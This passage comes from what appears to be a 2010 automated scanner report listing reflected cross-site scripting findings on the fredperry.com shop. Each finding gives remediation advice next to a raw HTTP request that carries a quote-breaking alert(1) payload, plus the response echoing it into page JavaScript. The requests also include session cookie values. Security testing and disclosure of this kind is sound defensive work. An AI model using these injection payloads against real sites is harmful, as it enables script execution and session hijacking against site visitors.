<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's B
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/men/?9dc8a"-alert(1)-"a9caf531ee8=1");
//]]>
...[SNIP]...

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f04a"-alert(1)-"172e220982f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags6f04a"-alert(1)-"172e220982f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=94un9ikch5osarj2upkkdtsjg7; expires=Tue, 09-Nov-2010 17:22:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags6f04a"-alert(1)-"172e220982f/women/");
//]]>
...[SNIP]...

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fabc8"-alert(1)-"0f5859d0a8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/womenfabc8"-alert(1)-"0f5859d0a8d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1vqfpruo2fkaf33lekrligvrs3; expires=Tue, 09-Nov-2010 17:22:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/womenfabc8"-alert(1)-"0f5859d0a8d/");
//]]>
...[SNIP]...

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 711a1"-alert(1)-"4fddbd7dfbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dflahktbppu5lbtqraphaglle2; expires=Tue, 09-Nov-2010 17:21:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/bags/women/?711a1"-alert(1)-"4fddbd7dfbd=1");
//]]>
...[SNIP]...

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6533"-alert(1)-"855d4def8e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:34:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=msbkftrehe2499gnpdc6fhajb3; expires=Tue, 09-Nov-2010 17:34:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearcha6533"-alert(1)-"855d4def8e2/ajax/suggest/");
//]]>
...[SNIP]...

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5389"-alert(1)-"a8da9f27867 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:36:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7ht57d6h8og3t308gnu6l0nns3; expires=Tue, 09-Nov-2010 17:36:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajaxa5389"-alert(1)-"a8da9f27867/suggest/");
//]]>
...[SNIP]...

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a148d"-alert(1)-"ab7ff097b6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:37:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=miih4kiqs00u95msd9dc70fdt3; expires=Tue, 09-Nov-2010 17:37:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/ajax/suggesta148d"-alert(1)-"ab7ff097b6d/");
//]]>
...[SNIP]...

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49ade"-alert(1)-"9853f03a934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch49ade"-alert(1)-"9853f03a934/result/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=30se6b9v1g6p0lo6svqgj1vgs1; expires=Tue, 09-Nov-2010 17:22:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch49ade"-alert(1)-"9853f03a934/result/");
//]]>
...[SNIP]...

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /catalogsearch/result/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d24f"-alert(1)-"1aca295eca0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /catalogsearch/result1d24f"-alert(1)-"1aca295eca0/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bp6840rulj7bcunchiglt11ee3; expires=Tue, 09-Nov-2010 17:22:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/catalogsearch/result1d24f"-alert(1)-"1aca295eca0/");
//]]>
...[SNIP]...

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fb5f"-alert(1)-"ef4f242604b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout6fb5f"-alert(1)-"ef4f242604b/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vi3g5moh1rl2cjoh82ejcl9rl5; expires=Tue, 09-Nov-2010 17:18:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout6fb5f"-alert(1)-"ef4f242604b/cart/");
//]]>
...[SNIP]...

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3f96"-alert(1)-"360bb29e453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/carte3f96"-alert(1)-"360bb29e453/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28opuu1bvek2saq3nnrtc74pk1; expires=Tue, 09-Nov-2010 17:18:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/carte3f96"-alert(1)-"360bb29e453/");
//]]>
...[SNIP]...

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaeb2"-alert(1)-"48ab0bad009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5nisihs029stoa57940hda3sn4; expires=Tue, 09-Nov-2010 17:17:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/checkout/cart/?aaeb2"-alert(1)-"48ab0bad009=1");
//]]>
...[SNIP]...

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd4e5"-alert(1)-"2ac73757ecd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contactsbd4e5"-alert(1)-"2ac73757ecd/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=jh0vo27j1jvpb68t8sdl5qirv6; expires=Tue, 09-Nov-2010 17:18:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contactsbd4e5"-alert(1)-"2ac73757ecd/");
//]]>
...[SNIP]...

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 464b0"-alert(1)-"4c1edb0da7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contacts/?464b0"-alert(1)-"4c1edb0da7a=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ne26v2iejs3kmhqd2l93g608e1; expires=Tue, 09-Nov-2010 17:17:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/contacts/?464b0"-alert(1)-"4c1edb0da7a=1");
//]]>
...[SNIP]...

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41986"-alert(1)-"bad21956557 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare41986"-alert(1)-"bad21956557/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
